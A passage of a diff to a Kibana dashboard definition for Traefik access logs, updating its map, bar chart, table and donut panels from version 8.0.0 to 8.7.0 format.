"[{\"alpha\":1,\"id\":\"cccbea23-8692-421c-80e4-0f33e025c810\",\"includeInFitToBounds\":true,\"label\":null,\"maxZoom\":24,\"minZoom\":0,\"sourceDescriptor\":{\"isAutoSelect\":true,\"lightModeDefault\":\"road_map_desaturated\",\"type\":\"EMS_TMS\"},\"style\":{\"type\":\"TILE\"},\"type\":\"EMS_VECTOR_TILE\",\"visible\":true},{\"alpha\":0.75,\"id\":\"151240fd-cdc3-41d3-aaf8-21af553ecb69\",\"includeInFitToBounds\":true,\"joins\":[],\"label\":\"Access Map [Logs Traefik]\",\"maxZoom\":24,\"minZoom\":0,\"sourceDescriptor\":{\"applyForceRefresh\":true,\"applyGlobalQuery\":true,\"applyGlobalTime\":true,\"geoField\":\"source.geo.location\",\"id\":\"a8ada758-9bca-4cde-93b2-a62db261663d\",\"indexPatternRefName\":\"layer_1_source_index_pattern\",\"metrics\":[{\"type\":\"count\"}],\"requestType\":\"point\",\"resolution\":\"MOST_FINE\",\"type\":\"ES_GEO_GRID\"},\"style\":{\"isTimeAware\":true,\"properties\":{\"fillColor\":{\"options\":{\"color\":\"Yellow to Red\",\"colorCategory\":\"palette_0\",\"field\":{\"name\":\"doc_count\",\"origin\":\"source\"},\"fieldMetaOptions\":{\"isEnabled\":false,\"sigma\":3},\"type\":\"ORDINAL\"},\"type\":\"DYNAMIC\"},\"icon\":{\"options\":{\"value\":\"marker\"},\"type\":\"STATIC\"},\"iconOrientation\":{\"options\":{\"orientation\":0},\"type\":\"STATIC\"},\"iconSize\":{\"options\":{\"field\":{\"name\":\"doc_count\",\"origin\":\"source\"},\"fieldMetaOptions\":{\"isEnabled\":false,\"sigma\":3},\"maxSize\":18,\"minSize\":7},\"type\":\"DYNAMIC\"},\"labelBorderColor\":{\"options\":{\"color\":\"#FFFFFF\"},\"type\":\"STATIC\"},\"labelBorderSize\":{\"options\":{\"size\":\"SMALL\"}},\"labelColor\":{\"options\":{\"color\":\"#000000\"},\"type\":\"STATIC\"},\"labelSize\":{\"options\":{\"size\":14},\"type\":\"STATIC\"},\"labelText\":{\"options\":{\"value\":\"\"},\"type\":\"STATIC\"},\"lineColor\":{\"options\":{\"color\":\"#3d3d3d\"},\"type\":\"STATIC\"},\"lineWidth\":{\"options\":{\"size\":1},\"type\":\"STATIC\"},\"symbolizeAs\":{\"options\":{\"value\":\"circle\"}}},\"type\":\"VECTOR\"},\"type\":\"GEOJSON_VECTOR\",\"visible\":true}]" + } }, - "optionsJSON": { - "darkTheme": false + "gridData": { + "h": 15, + "i": "121accaa-e45e-414b-b9a3-f73fba06cf83", + "w": 48, + "x": 0, + "y": 0 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "hiddenLayers": [], - "isLayerTOCOpen": true, - "mapBuffer": { - "maxLat": 40.9799, - "maxLon": 135, - "minLat": -40.9799, - "minLon": -135 - }, - "mapCenter": { - "lat": 19.94277, - "lon": 0, - "zoom": 2.11 - }, - "openTOCDetails": [] - }, - "gridData": { - "h": 15, - "i": "121accaa-e45e-414b-b9a3-f73fba06cf83", - "w": 48, - "x": 0, - "y": 0 - }, - "panelIndex": "121accaa-e45e-414b-b9a3-f73fba06cf83", - "panelRefName": "panel_121accaa-e45e-414b-b9a3-f73fba06cf83", - "type": "map", - "version": "8.0.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "logs-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-2b18aa0a-3889-45f0-9aa1-3ba3510050c3", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "2b18aa0a-3889-45f0-9aa1-3ba3510050c3": { - "columnOrder": [ - "9589a442-3d90-43f6-b4cc-1cecc12fd524", - "6d13e5b3-058b-4b1c-b5f0-fec158cc5750", - "6ff80030-787b-4fae-a4f4-7a0b0194e4ad" - ], - "columns": { - "6d13e5b3-058b-4b1c-b5f0-fec158cc5750": { - "customLabel": true, - "dataType": "number", - "isBucketed": true, - "label": "http.response.status_code: Descending", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "6ff80030-787b-4fae-a4f4-7a0b0194e4ad", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "http.response.status_code" - }, - "6ff80030-787b-4fae-a4f4-7a0b0194e4ad": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Count", - "operationType": "count", - "scale": "ratio", - "sourceField": "Records" - }, - "9589a442-3d90-43f6-b4cc-1cecc12fd524": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "(data_stream.dataset:traefik.access)" + "panelIndex": "121accaa-e45e-414b-b9a3-f73fba06cf83", + "type": "map", + "version": "8.4.0" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "2efa927c-4fd1-4073-9b78-8ef6ec27200d", + "w": 48, + "x": 0, + "y": 15 + }, + "panelIndex": "2efa927c-4fd1-4073-9b78-8ef6ec27200d", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-2b18aa0a-3889-45f0-9aa1-3ba3510050c3", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "2b18aa0a-3889-45f0-9aa1-3ba3510050c3": { + "columnOrder": [ + "9589a442-3d90-43f6-b4cc-1cecc12fd524", + "6d13e5b3-058b-4b1c-b5f0-fec158cc5750", + "6ff80030-787b-4fae-a4f4-7a0b0194e4ad" + ], + "columns": { + "6d13e5b3-058b-4b1c-b5f0-fec158cc5750": { + "customLabel": true, + "dataType": "number", + "isBucketed": true, + "label": "http.response.status_code: Descending", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "6ff80030-787b-4fae-a4f4-7a0b0194e4ad", + "type": "column" }, - "visualization": { - "gridlinesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "6ff80030-787b-4fae-a4f4-7a0b0194e4ad" - ], - "layerId": "2b18aa0a-3889-45f0-9aa1-3ba3510050c3", - "layerType": "data", - "position": "top", - "seriesType": "bar_stacked", - "showGridlines": false, - "splitAccessor": "6d13e5b3-058b-4b1c-b5f0-fec158cc5750", - "xAccessor": "9589a442-3d90-43f6-b4cc-1cecc12fd524", - "yConfig": [ - { - "axisMode": "left", - "forAccessor": "6ff80030-787b-4fae-a4f4-7a0b0194e4ad" - } - ] - } - ], - "legend": { - "isVisible": true, - "position": "right", - "showSingleSeries": true - }, - "preferredSeriesType": "bar_stacked", - "title": "Empty XY chart", - "valueLabels": "hide", - "valuesInLegend": false, - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - } - } + "orderDirection": "desc", + "otherBucket": true, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "http.response.status_code" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {} + "6ff80030-787b-4fae-a4f4-7a0b0194e4ad": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + }, + "9589a442-3d90-43f6-b4cc-1cecc12fd524": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "interval": "auto", + "includeEmptyRows": true + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "(data_stream.dataset:traefik.access)" + }, + "visualization": { + "gridlinesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 12, - "i": "2efa927c-4fd1-4073-9b78-8ef6ec27200d", - "w": 48, - "x": 0, - "y": 15 + "layers": [ + { + "accessors": [ + "6ff80030-787b-4fae-a4f4-7a0b0194e4ad" + ], + "layerId": "2b18aa0a-3889-45f0-9aa1-3ba3510050c3", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "splitAccessor": "6d13e5b3-058b-4b1c-b5f0-fec158cc5750", + "xAccessor": "9589a442-3d90-43f6-b4cc-1cecc12fd524", + "yConfig": [ + { + "axisMode": "left", + "forAccessor": "6ff80030-787b-4fae-a4f4-7a0b0194e4ad" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "right", + "showSingleSeries": true, + "legendSize": "auto" }, - "panelIndex": "2efa927c-4fd1-4073-9b78-8ef6ec27200d", - "title": "Response codes over time [Logs Traefik]", - "type": "lens", - "version": "8.0.0" + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "valuesInLegend": false, + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + } + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "logs-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-ef238d74-b1e4-43f4-a941-8ffd25108069", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "ef238d74-b1e4-43f4-a941-8ffd25108069": { - "columnOrder": [ - "607e1467-5e59-4bd0-85fc-18a9c7a87ad0", - "54e6eb58-591a-4687-96a5-c5a86d89f84b", - "d30886a2-878c-4684-ad70-e678d5c373f1" - ], - "columns": { - "54e6eb58-591a-4687-96a5-c5a86d89f84b": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Top URLs", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "d30886a2-878c-4684-ad70-e678d5c373f1", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "url.original" - }, - "607e1467-5e59-4bd0-85fc-18a9c7a87ad0": { - "customLabel": true, - "dataType": "number", - "isBucketed": true, - "label": "http.response.status_code", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "d30886a2-878c-4684-ad70-e678d5c373f1", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "http.response.status_code" - }, - "d30886a2-878c-4684-ad70-e678d5c373f1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Count", - "operationType": "count", - "scale": "ratio", - "sourceField": "Records" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "type": "lens" + }, + "title": "Response codes over time [Logs Traefik]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "b22d8a5b-a46f-4763-a884-e0032620fb37", + "w": 48, + "x": 0, + "y": 27 + }, + "panelIndex": "b22d8a5b-a46f-4763-a884-e0032620fb37", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-ef238d74-b1e4-43f4-a941-8ffd25108069", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "ef238d74-b1e4-43f4-a941-8ffd25108069": { + "columnOrder": [ + "607e1467-5e59-4bd0-85fc-18a9c7a87ad0", + "54e6eb58-591a-4687-96a5-c5a86d89f84b", + "d30886a2-878c-4684-ad70-e678d5c373f1" + ], + "columns": { + "54e6eb58-591a-4687-96a5-c5a86d89f84b": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Top URLs", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "d30886a2-878c-4684-ad70-e678d5c373f1", + "type": "column" }, - "filters": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "url.original" + }, + "607e1467-5e59-4bd0-85fc-18a9c7a87ad0": { + "customLabel": true, + "dataType": "number", + "isBucketed": true, + "label": "http.response.status_code", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "d30886a2-878c-4684-ad70-e678d5c373f1", + "type": "column" }, - "visualization": { - "columns": [ - { - "columnId": "607e1467-5e59-4bd0-85fc-18a9c7a87ad0", - "isTransposed": true - }, - { - "columnId": "607e1467-5e59-4bd0-85fc-18a9c7a87ad0", - "isTransposed": true - }, - { - "columnId": "54e6eb58-591a-4687-96a5-c5a86d89f84b", - "isTransposed": false - }, - { - "columnId": "d30886a2-878c-4684-ad70-e678d5c373f1", - "isTransposed": false - } - ], - "layerId": "ef238d74-b1e4-43f4-a941-8ffd25108069", - "layerType": "data" - } + "orderDirection": "desc", + "otherBucket": false, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "http.response.status_code" }, - "title": "", - "type": "lens", - "visualizationType": "lnsDatatable" - }, - "enhancements": {} - }, - "gridData": { - "h": 12, - "i": "b22d8a5b-a46f-4763-a884-e0032620fb37", - "w": 48, - "x": 0, - "y": 27 - }, - "panelIndex": "b22d8a5b-a46f-4763-a884-e0032620fb37", - "title": "Response codes by top URLs [Logs Traefik]", - "type": "lens", - "version": "8.0.0" + "d30886a2-878c-4684-ad70-e678d5c373f1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "607e1467-5e59-4bd0-85fc-18a9c7a87ad0", + "isTransposed": true + }, + { + "columnId": "607e1467-5e59-4bd0-85fc-18a9c7a87ad0", + "isTransposed": true + }, + { + "columnId": "54e6eb58-591a-4687-96a5-c5a86d89f84b", + "isTransposed": false + }, + { + "columnId": "d30886a2-878c-4684-ad70-e678d5c373f1", + "isTransposed": false + } + ], + "layerId": "ef238d74-b1e4-43f4-a941-8ffd25108069", + "layerType": "data", + "rowHeight": "single", + "rowHeightLines": 1 + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "logs-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-4197aa5d-acaf-4763-b484-11eb2549236f", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "4197aa5d-acaf-4763-b484-11eb2549236f": { - "columnOrder": [ - "2a765fd5-0372-4b9d-905f-f4b4f26a6447", - "71cbfad3-6ff2-4f28-9020-3bfe22ff57ae", - "6d5f8062-c79c-486c-9794-6573d150079e" - ], - "columns": { - "2a765fd5-0372-4b9d-905f-f4b4f26a6447": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "user_agent.name: Descending", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "6d5f8062-c79c-486c-9794-6573d150079e", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "user_agent.name" - }, - "6d5f8062-c79c-486c-9794-6573d150079e": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Count", - "operationType": "count", - "scale": "ratio", - "sourceField": "Records" - }, - "71cbfad3-6ff2-4f28-9020-3bfe22ff57ae": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "user_agent.version: Descending", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "6d5f8062-c79c-486c-9794-6573d150079e", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "user_agent.version" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "" + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "type": "lens" + }, + "title": "Response codes by top URLs [Logs Traefik]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 16, + "i": "d299d213-6e63-485b-9c58-61209d984bce", + "w": 16, + "x": 0, + "y": 39 + }, + "panelIndex": "d299d213-6e63-485b-9c58-61209d984bce", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-4197aa5d-acaf-4763-b484-11eb2549236f", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "4197aa5d-acaf-4763-b484-11eb2549236f": { + "columnOrder": [ + "2a765fd5-0372-4b9d-905f-f4b4f26a6447", + "71cbfad3-6ff2-4f28-9020-3bfe22ff57ae", + "6d5f8062-c79c-486c-9794-6573d150079e" + ], + "columns": { + "2a765fd5-0372-4b9d-905f-f4b4f26a6447": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "user_agent.name: Descending", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "6d5f8062-c79c-486c-9794-6573d150079e", + "type": "column" }, - "visualization": { - "layers": [ - { - "categoryDisplay": "default", - "groups": [ - "2a765fd5-0372-4b9d-905f-f4b4f26a6447", - "71cbfad3-6ff2-4f28-9020-3bfe22ff57ae" - ], - "layerId": "4197aa5d-acaf-4763-b484-11eb2549236f", - "layerType": "data", - "legendDisplay": "show", - "legendPosition": "bottom", - "metric": "6d5f8062-c79c-486c-9794-6573d150079e", - "nestedLegend": false, - "numberDisplay": "percent" - } - ], - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "shape": "donut" - } + "orderDirection": "desc", + "otherBucket": false, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "user_agent.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsPie" - }, - "enhancements": {} - }, - "gridData": { - "h": 16, - "i": "d299d213-6e63-485b-9c58-61209d984bce", - "w": 16, - "x": 0, - "y": 39 + "6d5f8062-c79c-486c-9794-6573d150079e": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + }, + "71cbfad3-6ff2-4f28-9020-3bfe22ff57ae": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "user_agent.version: Descending", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "6d5f8062-c79c-486c-9794-6573d150079e", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "user_agent.version" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "4197aa5d-acaf-4763-b484-11eb2549236f", + "layerType": "data", + "legendDisplay": "show", + "legendPosition": "bottom", + "nestedLegend": false, + "numberDisplay": "percent", + "legendSize": "auto", + "primaryGroups": [ + "2a765fd5-0372-4b9d-905f-f4b4f26a6447", + "71cbfad3-6ff2-4f28-9020-3bfe22ff57ae" + ], + "metrics": [ + "6d5f8062-c79c-486c-9794-6573d150079e" + ] + } + ], + "palette": { + "name": "kibana_palette", + "type": "palette" }, - "panelIndex": "d299d213-6e63-485b-9c58-61209d984bce", - "title": "Browsers breakdown [Logs Traefik]", - "type": "lens", - "version": "8.0.0" + "shape": "donut" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "logs-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-38d38e12-d8c2-41a2-944b-f543271336df", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "38d38e12-d8c2-41a2-944b-f543271336df": { - "columnOrder": [ - "3bb8db2c-ba41-4927-8679-d0cd1fbfcf36", - "27deb44a-1572-43a0-9db2-34e312e891a3", - "97ebb05c-0b6e-4828-aff7-154fd2726900" - ], - "columns": { - "27deb44a-1572-43a0-9db2-34e312e891a3": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "user_agent.os.version: Descending", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "97ebb05c-0b6e-4828-aff7-154fd2726900", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "user_agent.os.version" - }, - "3bb8db2c-ba41-4927-8679-d0cd1fbfcf36": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "user_agent.os.name: Descending", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "97ebb05c-0b6e-4828-aff7-154fd2726900", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "user_agent.os.name" - }, - "97ebb05c-0b6e-4828-aff7-154fd2726900": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Count", - "operationType": "count", - "scale": "ratio", - "sourceField": "Records" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "type": "lens" + }, + "title": "Browsers breakdown [Logs Traefik]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 16, + "i": "2386dd27-15d0-42ac-85f2-406febb6d3b1", + "w": 16, + "x": 16, + "y": 39 + }, + "panelIndex": "2386dd27-15d0-42ac-85f2-406febb6d3b1", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-38d38e12-d8c2-41a2-944b-f543271336df", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "38d38e12-d8c2-41a2-944b-f543271336df": { + "columnOrder": [ + "3bb8db2c-ba41-4927-8679-d0cd1fbfcf36", + "27deb44a-1572-43a0-9db2-34e312e891a3", + "97ebb05c-0b6e-4828-aff7-154fd2726900" + ], + "columns": { + "27deb44a-1572-43a0-9db2-34e312e891a3": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "user_agent.os.version: Descending", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "97ebb05c-0b6e-4828-aff7-154fd2726900", + "type": "column" }, - "filters": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "user_agent.os.version" + }, + "3bb8db2c-ba41-4927-8679-d0cd1fbfcf36": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "user_agent.os.name: Descending", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "97ebb05c-0b6e-4828-aff7-154fd2726900", + "type": "column" }, - "visualization": { - "layers": [ - { - "categoryDisplay": "default", - "groups": [ - "3bb8db2c-ba41-4927-8679-d0cd1fbfcf36", - "27deb44a-1572-43a0-9db2-34e312e891a3" - ], - "layerId": "38d38e12-d8c2-41a2-944b-f543271336df", - "layerType": "data", - "legendDisplay": "show", - "legendPosition": "bottom", - "metric": "97ebb05c-0b6e-4828-aff7-154fd2726900", - "nestedLegend": false, - "numberDisplay": "percent" - } - ], - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "shape": "donut" - } + "orderDirection": "desc", + "otherBucket": false, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "user_agent.os.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsPie" - }, - "enhancements": {} - }, - "gridData": { - "h": 16, - "i": "2386dd27-15d0-42ac-85f2-406febb6d3b1", - "w": 16, - "x": 16, - "y": 39 + "97ebb05c-0b6e-4828-aff7-154fd2726900": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "38d38e12-d8c2-41a2-944b-f543271336df", + "layerType": "data", + "legendDisplay": "show", + "legendPosition": "bottom", + "nestedLegend": false, + "numberDisplay": "percent", + "legendSize": "auto", + "primaryGroups": [ + "3bb8db2c-ba41-4927-8679-d0cd1fbfcf36", + "27deb44a-1572-43a0-9db2-34e312e891a3" + ], + "metrics": [ + "97ebb05c-0b6e-4828-aff7-154fd2726900" + ] + } + ], + "palette": { + "name": "kibana_palette", + "type": "palette" }, - "panelIndex": "2386dd27-15d0-42ac-85f2-406febb6d3b1", - "title": "Operating systems breakdown [Logs Traefik]", - "type": "lens", - "version": "8.0.0" + "shape": "donut" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "logs-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-7042a118-2f13-41fb-b0e6-192c1233689d", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-0b13f4d2-11cd-47b5-8128-7dcb60514861", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "0b13f4d2-11cd-47b5-8128-7dcb60514861": { - "columnOrder": [ - "df0a2fac-79a4-4354-a468-b9a6992e9335", - "092db128-4fe0-463d-aee6-871ea4032f18" - ], - "columns": { - "092db128-4fe0-463d-aee6-871ea4032f18": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Count", - "operationType": "count", - "scale": "ratio", - "sourceField": "Records" - }, - "df0a2fac-79a4-4354-a468-b9a6992e9335": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - }, - "7042a118-2f13-41fb-b0e6-192c1233689d": { - "columnOrder": [ - "bca2786a-0632-4fcb-bddf-6d0a9259844f", - "f4e8ed07-3254-4ec6-b80d-8568d9ea7018" - ], - "columns": { - "bca2786a-0632-4fcb-bddf-6d0a9259844f": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "f4e8ed07-3254-4ec6-b80d-8568d9ea7018": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Data sent", - "operationType": "sum", - "scale": "ratio", - "sourceField": "http.response.body.bytes" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "data_stream.dataset:traefik.access" - }, - "visualization": { - "fittingFunction": "Linear", - "layers": [ - { - "accessors": [ - "f4e8ed07-3254-4ec6-b80d-8568d9ea7018" - ], - "layerId": "7042a118-2f13-41fb-b0e6-192c1233689d", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "xAccessor": "bca2786a-0632-4fcb-bddf-6d0a9259844f" - }, - { - "accessors": [ - "092db128-4fe0-463d-aee6-871ea4032f18" - ], - "layerId": "0b13f4d2-11cd-47b5-8128-7dcb60514861", - "layerType": "data", - "seriesType": "line", - "xAccessor": "df0a2fac-79a4-4354-a468-b9a6992e9335", - "yConfig": [ - { - "axisMode": "right", - "color": "#d6bf57", - "forAccessor": "092db128-4fe0-463d-aee6-871ea4032f18" - } - ] - } - ], - "legend": { - "isVisible": true, - "position": "right" - }, - "preferredSeriesType": "line", - "title": "Empty XY chart", - "valueLabels": "hide", - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "type": "lens" + }, + "title": "Operating systems breakdown [Logs Traefik]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 16, + "i": "5ca3d02c-d713-41c9-abe8-a9c4a1f97c3d", + "w": 16, + "x": 32, + "y": 39 + }, + "panelIndex": "5ca3d02c-d713-41c9-abe8-a9c4a1f97c3d", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-7042a118-2f13-41fb-b0e6-192c1233689d", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-0b13f4d2-11cd-47b5-8128-7dcb60514861", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "0b13f4d2-11cd-47b5-8128-7dcb60514861": { + "columnOrder": [ + "df0a2fac-79a4-4354-a468-b9a6992e9335", + "092db128-4fe0-463d-aee6-871ea4032f18" + ], + "columns": { + "092db128-4fe0-463d-aee6-871ea4032f18": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "df0a2fac-79a4-4354-a468-b9a6992e9335": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "interval": "auto", + "includeEmptyRows": true + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} }, - 